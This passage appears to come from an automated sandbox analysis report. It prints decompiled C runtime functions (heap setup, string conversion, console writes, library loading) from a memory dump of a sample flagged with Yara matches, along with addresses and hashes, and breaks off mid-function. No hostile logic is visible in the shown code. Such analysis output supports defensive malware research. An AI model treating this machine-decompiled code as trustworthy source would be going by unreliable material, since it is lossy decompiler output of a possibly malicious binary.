                  • Opcode Fuzzy Hash: 81a6643d8d766bf2a1e14be1042f56af57549ae9e9951545f306693b5f2864aa
                  • Instruction Fuzzy Hash: 02515AB19102099BDB15CFA9DA8979ABBF4FB08314F14C57AD804EB390D3B8A915CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                  0x004067fe
                  0x00406806
                  0x0040680e

                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                  • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
                  • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                  • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                  Download Yara Rule
                  C-Code - Quality: 70%
                  			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0xb75fb7c4
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080DB(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                  0x004078d4
                  0x004078d5
                  0x004078d6
                  0x004078dd
                  0x004078e2
                  0x004078e8
                  0x004078ee
                  0x004078f4
                  0x004078f7
                  0x004078f7
                  0x004078fa
                  0x004078fc
                  0x004078fc
                  0x004078fa
                  0x004078fe
                  0x00407903
                  0x0040790a
                  0x0040790d
                  0x0040790d
                  0x00407929
                  0x0040792f
                  0x00407934
                  0x00407ac7
                  0x00407ad2
                  0x00407ada
                  0x0040793a
                  0x0040793a
                  0x0040793d
                  0x00407942
                  0x00407946
                  0x0040799a
                  0x0040799a
                  0x0040799c
                  0x0040799e
                  0x00407abc
                  0x00407abc
                  0x00407abe
                  0x00407abf
                  0x00407ac5
                  0x00000000
                  0x00407ac5
                  0x004079af
                  0x004079b5
                  0x004079b7
                  0x00000000
                  0x00000000
                  0x004079bd
                  0x004079cf
                  0x004079d4
                  0x004079d8
                  0x00000000
                  0x00000000
                  0x004079e5
                  0x00407a1f
                  0x00407a22
                  0x00407a25
                  0x00407a27
                  0x00407a29
                  0x00407a2b
                  0x00407a77
                  0x00407a77
                  0x00407a79
                  0x00407a79
                  0x00407a7b
                  0x00407ab5
                  0x00407ab6
                  0x00000000
                  0x00407abb
                  0x00407a8f
                  0x00407a94
                  0x00407a96
                  0x00000000
                  0x00000000
                  0x00407a9a
                  0x00407a9b
                  0x00407a9c
                  0x00407a9f
                  0x00407adb
                  0x00407ade
                  0x00407aa1
                  0x00407aa1
                  0x00407aa2
                  0x00407aa2
                  0x00407aaf
                  0x00407ab1
                  0x00407ab3
                  0x00407ae4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00407ab3
                  0x00407a2d
                  0x00407a30
                  0x00407a32
                  0x00407a34
                  0x00407a36
                  0x00407a39
                  0x00407a3e
                  0x00407a59
                  0x00407a5b
                  0x00407a65
                  0x00407a67
                  0x00407a68
                  0x00407a6a
                  0x00000000
                  0x00000000
                  0x00407a6c
                  0x00407a72
                  0x00407a72
                  0x00000000
                  0x00407a72
                  0x00407a40
                  0x00407a42
                  0x00407a46
                  0x00407a4b
                  0x00407a4d
                  0x00407a4f
                  0x00000000
                  0x00000000
                  0x00407a51
                  0x00000000
                  0x00407a51
                  0x004079e7
                  0x004079ec
                  0x00000000
                  0x00000000
                  0x004079f2
                  0x004079f4
                  0x00000000
                  0x00000000
                  0x00407a10
                  0x00407a14
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00407a1a
                  0x0040794d
                  0x0040794f
                  0x00407951
                  0x00407959
                  0x00407978
                  0x0040797a
                  0x00407984
                  0x00407986
                  0x00407987
                  0x00407989
                  0x00000000
                  0x00000000
                  0x0040798f
                  0x00407995
                  0x00407995
                  0x00000000
                  0x00407995
                  0x0040795d
                  0x00407961
                  0x00407966
                  0x0040796a
                  0x00000000
                  0x00000000
                  0x00407970
                  0x00000000
                  0x00407970

                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                  • __alloca_probe_16.LIBCMT ref: 00407961
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                  • __alloca_probe_16.LIBCMT ref: 00407A46
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                  • __freea.LIBCMT ref: 00407AB6
                    • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                  • __freea.LIBCMT ref: 00407ABF
                  • __freea.LIBCMT ref: 00407AE4
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                  • String ID:
                  • API String ID: 3864826663-0
                  • Opcode ID: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                  • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                  • Opcode Fuzzy Hash: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                  • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00408226, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0xb75fb7c4
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                  0x0040822e
                  0x00408235
                  0x00408238
                  0x00408240
                  0x00408244
                  0x00408250
                  0x00408253
                  0x00408256
                  0x0040825d
                  0x00408265
                  0x00408268
                  0x0040826e
                  0x00408274
                  0x00408279
                  0x0040827b
                  0x0040827e
                  0x00408283
                  0x0040828d
                  0x00408294
                  0x00408297
                  0x0040829e
                  0x004082a5
                  0x004082d1
                  0x004082f7
                  0x004082f9
                  0x00000000
                  0x004082d3
                  0x004082d6
                  0x0040839d
                  0x004083a9
                  0x004083b4
                  0x004083b9
                  0x004082dc
                  0x004082e3
                  0x004082e8
                  0x004082ee
                  0x004082f4
                  0x00000000
                  0x004082f4
                  0x004082ee
                  0x004082d6
                  0x004082a7
                  0x004082ab
                  0x004082ae
                  0x004082b4
                  0x004082b6
                  0x004082b9
                  0x004082bd
                  0x004082fa
                  0x004082fd
                  0x004082fe
                  0x00408303
                  0x00408309
                  0x0040830f
                  0x0040831e
                  0x00408324
                  0x0040832a
                  0x0040832f
                  0x0040834b
                  0x004083be
                  0x004083c4
                  0x0040834d
                  0x00408355
                  0x0040835e
                  0x00408364
                  0x00000000
                  0x00408366
                  0x00408368
                  0x0040836b
                  0x00408384
                  0x00000000
                  0x00408386
                  0x0040838a
                  0x0040838c
                  0x0040838f
                  0x00000000
                  0x0040838f
                  0x0040838a
                  0x00408384
                  0x00408364
                  0x0040835e
                  0x0040834b
                  0x0040832f
                  0x00408309
                  0x00000000
                  0x00408392
                  0x00408392
                  0x004083c6
                  0x004083d0
                  0x004083d8

                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                  • __fassign.LIBCMT ref: 004082E3
                  • __fassign.LIBCMT ref: 004082FE
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                  • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                  • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                  • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
                  • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                  • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 27%
                  			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0xb75fb7c4
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                  0x00403639
                  0x00403640
                  0x00403643
                  0x00403647
                  0x00403652
                  0x0040365a
                  0x00403665
                  0x0040366b
                  0x0040366f
                  0x00403676
                  0x0040367c
                  0x0040367c
                  0x0040367e
                  0x00403683
                  0x00403688
                  0x00403688
                  0x00403693
                  0x0040369b

                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                  • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                  • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                  • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                  • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0xb75fb7c4
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                  0x004062c0
                  0x004062c7
                  0x004062ca
                  0x004062d3
                  0x004062d8
                  0x004062dd
                  0x004062e2
                  0x004062e5
                  0x004062e7
                  0x004062e7
                  0x004062ec
                  0x00406305
                  0x0040630b
                  0x00406310
                  0x004063af
                  0x004063b3
                  0x004063b8
                  0x004063b8
                  0x004063cc
                  0x004063d4
                  0x004063d4
                  0x00406316
                  0x00406319
                  0x0040631e
                  0x00406322
                  0x0040636e
                  0x00406370
                  0x00406372
                  0x00406377
                  0x0040638e
                  0x00406396
                  0x004063a6
                  0x004063a6
                  0x00406396
                  0x004063a8
                  0x004063a9
                  0x00000000
                  0x004063ae
                  0x00406324
                  0x00406329
                  0x0040632b
                  0x0040632d
                  0x0040632d
                  0x00406335
                  0x00406352
                  0x0040635c
                  0x00406361
                  0x00000000
                  0x00000000
                  0x00406363
                  0x00406369
                  0x00406369
                  0x00000000
                  0x00406369
                  0x00406339
                  0x0040633d
                  0x00406342
                  0x00406346
                  0x00000000
                  0x00000000
                  0x00406348
                  0x00000000

                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                  • __alloca_probe_16.LIBCMT ref: 0040633D
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                  • __freea.LIBCMT ref: 004063A9
                    • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                  • String ID:
                  • API String ID: 313313983-0
                  • Opcode ID: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                  • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                  • Opcode Fuzzy Hash: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                  • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xb75fb7c5
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                  0x00405756
                  0x0040575a
                  0x00405761
                  0x00405765
                  0x00405773
                  0x00405789
                  0x0040578d
                  0x004057b6
                  0x004057b8
                  0x004057bc
                  0x004057bf
                  0x004057bf
                  0x004057c5
                  0x004057c7
                  0x00000000
                  0x004057c8
                  0x0040578f
                  0x00405798
                  0x004057a7
                  0x0040579a
                  0x0040579d
                  0x004057a3
                  0x004057a3
                  0x004057ab
                  0x00000000
                  0x004057ad
                  0x004057b0
                  0x004057b2
                  0x00000000
                  0x004057b2
                  0x004057ab
                  0x00405767
                  0x0040576c
                  0x00000000

                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                  • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                  • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                  • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                  • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
